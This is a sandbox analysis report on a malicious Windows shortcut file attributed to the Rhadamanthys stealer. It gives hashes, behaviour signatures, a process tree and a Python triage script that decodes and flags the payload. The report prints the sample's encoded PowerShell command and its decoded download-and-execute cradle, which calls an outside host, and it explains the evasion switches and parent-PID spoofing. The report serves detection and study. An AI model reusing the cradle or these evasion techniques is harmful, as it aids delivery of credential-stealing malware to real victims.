Analysis

max time kernel: 147s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-04-2024 11:16
Static task: static1

Behavioral task: behavioral1
  Sample: DOC692-692692.lnk
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: DOC692-692692.lnk
  Resource: win10v2004-20240226-en
General

Target: DOC692-692692.lnk
Size: 9KB
MD5: a344b567076691b5cd838512c99bc884
SHA1: 0de4ad8f9f127c0c444bb7db4459d0977b1f6506
SHA256: decbd662ecab295cb2c060232a6de8218843d671b7cb628aaf769ba4bcdf126f
SHA512: ad6d3fed7647c933c9a23938f7c39a8799d5845cd6a9e1fec6d0a2044c740795d428e89467c4e5b1f8217217f272863438b68e160da312d6ae8498af9688dd98
SSDEEP: 192:8z5phm3MSBfQbxE4l2g9FWV4FBno2dzSkbP43O5yrf68g493f61hVNeXkI:u5fcMS5Qb6EouFB3dzBbw3Omf68Zp9XV
Malware Config
Signatures
Rhadamanthys
Rhadamanthys is an information stealer written in C++, first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes:
  description: PID 4960 created 2824 | pid: 4960 | process: powershell.exe | target process: sihost.exe
  The process tree and the WriteProcessMemory entries below show the practical effect: powershell.exe (PID 4960) creates dialer.exe (PID 3656) and writes into it, yet dialer.exe is recorded under sihost.exe (PID 2824). That is parent-PID spoofing: the creator passes an explicit parent handle so the new process shows an unrelated, trusted parent and does not appear as a child of the script host.

Blocklisted process makes network request (1 IoC)
Processes:
  flow: 6 | pid: 4960 | process: powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes:
  description: Key value queried | ioc: \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | process: cmd.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
  pid: 4960 | process: powershell.exe  (4 occurrences)
  pid: 3656 | process: dialer.exe  (2 occurrences)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description: Token: SeDebugPrivilege | pid: 4960 | process: powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  description: PID 744 wrote to memory of 4960 | pid: 744 | process: cmd.exe | target process: powershell.exe  (2 occurrences)
  description: PID 4960 wrote to memory of 3656 | pid: 4960 | process: powershell.exe | target process: dialer.exe  (4 occurrences)
Processes

C:\Windows\system32\sihost.exe  [PID 2824]
  command line: sihost.exe
  └ C:\Windows\system32\dialer.exe  [PID 3656]
      command line: "C:\Windows\system32\dialer.exe"
      - Suspicious behavior: EnumeratesProcesses
      (Shown under sihost.exe only because its parent was spoofed; the WriteProcessMemory entries identify powershell.exe, PID 4960, as the process that created it and wrote into it.)

C:\Windows\system32\cmd.exe  [PID 744]
  command line: cmd /c C:\Users\Admin\AppData\Local\Temp\DOC692-692692.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  └ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4960]
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==
      decoded -Enc payload (base64 of a UTF-16LE string): (iwr https://imanikuu.com/done.txt -UseBasicParsing).Content | iNvOkE-ExPreSsiOn
      i.e. fetch a remote text file and pipe it straight into Invoke-Expression; the mixed-case cmdlet name and the -NoP / -Ex Bypass / -WindowStyle Hidden switches are there to dodge string matching and keep the window from appearing.
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
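The two checks an analyst wants from this tree are decoding the -Enc argument and confirming the parent-PID mismatch. The script below is an added example, not part of the sandbox report or of the sandbox's own detection code: it decodes powershell.exe's encoded command (base64 of UTF-16LE), flags download-and-execute cradles even when their cmdlet names are case-randomised, and reports any process whose creator differs from the parent the tree shows. The process records are constructed by transcribing the tree and the WriteProcessMemory rows above; the field names (pid, image, cmdline, creator, parent) and the list of cradle keywords are this example's own assumptions.

```python
import base64
import re

# powershell.exe accepts any prefix of "EncodedCommand" plus the "ec" alias.
# Longest prefix first so the alternation does not settle on "-e" too early.
_ENC_SWITCH = "|".join(["encodedcommand"[:i] for i in range(14, 0, -1)] + ["ec"])
_ENC_RE = re.compile(
    r"(?<!\S)[-/](?:" + _ENC_SWITCH + r")[\s:]+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
# Cradle primitives worth flagging after decoding (assumed list, not exhaustive).
_CRADLE_RE = re.compile(
    r"invoke-expression|\biex\b|invoke-webrequest|\biwr\b|downloadstring"
    r"|net\.webclient|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
_URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

# Command line copied verbatim from the report's process tree.
ENC_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoP -Ex Bypass -WindowStyle Hidden -Enc "
    "KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAv"
    "AGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMA"
    "bwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA=="
)

# Constructed records: creator = PID that spawned/wrote into the process
# (WriteProcessMemory rows); parent = PID the process tree reports.
PROCESSES = [
    {"pid": 2824, "image": r"C:\Windows\system32\sihost.exe",
     "cmdline": "sihost.exe", "creator": None, "parent": None},
    {"pid": 744, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\DOC692-692692.lnk",
     "creator": None, "parent": None},
    {"pid": 4960, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ENC_CMDLINE, "creator": 744, "parent": 744},
    {"pid": 3656, "image": r"C:\Windows\system32\dialer.exe",
     "cmdline": r'"C:\Windows\system32\dialer.exe"', "creator": 4960, "parent": 2824},
]


def decode_encoded_command(cmdline):
    """Return the decoded -Enc payload of a powershell command line, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")


def _odd_case(token):
    """True for case-randomised tokens such as iNvOkE-ExPreSsiOn."""
    parts = token.split("-")
    return not (token.islower() or token.isupper()
                or all(p[:1].isupper() and p[1:].islower() for p in parts))


def analyse_powershell(cmdline):
    """Decode the payload and report cradle indicators, URLs and case games."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"decoded": None, "indicators": [], "urls": [], "case_randomised": False}
    hits = [h.group(0) for h in _CRADLE_RE.finditer(decoded)]
    return {
        "decoded": decoded,
        "indicators": hits,
        "urls": _URL_RE.findall(decoded),
        "case_randomised": any(_odd_case(h) for h in hits),
    }


def find_parent_spoofing(processes):
    """(pid, creator, reported parent) for each process whose creator is not
    the parent the tree shows: the NtCreateUserProcessOtherParentProcess case."""
    return [(p["pid"], p["creator"], p["parent"]) for p in processes
            if p["creator"] is not None and p["parent"] is not None
            and p["creator"] != p["parent"]]


def triage(processes):
    """Run both checks over the records and return a list of findings."""
    findings = []
    for p in processes:
        if p["image"].lower().endswith("powershell.exe"):
            result = analyse_powershell(p["cmdline"])
            if result["decoded"] is not None:
                findings.append(("encoded_command", p["pid"], result))
    for pid, creator, parent in find_parent_spoofing(processes):
        findings.append(("parent_pid_spoofing", pid,
                         {"creator": creator, "reported_parent": parent}))
    return findings


if __name__ == "__main__":
    for kind, pid, detail in triage(PROCESSES):
        print(kind, pid, detail)
```

The switch regex deliberately requires whitespace or a colon after the switch name so that -Ex (ExecutionPolicy) is not mistaken for a truncated -EncodedCommand; the case check fires on iNvOkE-ExPreSsiOn but not on an ordinary iwr, which is the distinction a signature that only lowercases its input would miss.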
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82